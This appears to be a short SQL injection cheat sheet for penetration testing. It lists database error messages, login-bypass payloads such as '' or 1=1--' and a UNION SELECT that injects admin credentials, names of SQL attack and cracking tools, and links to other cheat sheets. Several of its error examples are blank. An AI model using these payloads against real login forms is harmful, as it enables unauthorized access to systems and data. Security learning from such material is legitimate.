General info
There are four common database types: (each one will report errors in different ways)
- MySQL
- error example:
The used SELECT statements have a different number of columns
- error example:
- MSSQL
- error example:
All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists
- error example:
- Oracle
- error example:
- Postgre-SQL
- error example:
Each UNION query must have the same number of columns
- error example:
Injection (SQLi)
Easy Injection Tests (aka Login Tricks)
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1-- -
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
'UNION SELECT 1, 'admin', 'password', 1--
Automatic scanning with SQLMap
Resources / More info
SQL Injection Hacking Tools
- SQLDict – Performs a dictionary attack against the SQL server
- SQLExec – Executes commands on a compromised SQL server
- SQLbf – Another password cracking program that performs both dictionary and brute force attacks
- SQLSmack – Linux based command shell program
- SQL2.exe – This UDP buffer overflow attack will return a command prompt to the attacker
- Msadc.pl – A SQL injection exploit
- Wapiti
- http://securitytools.wikidot.com/sql-injection
- https://securiteam.com/securityreviews/5DP0N1P76E
Links
Cheatsheets and more
SQLi Cheat Sheet - netsparker
SQLi Cheat Sheet - pentestmonkey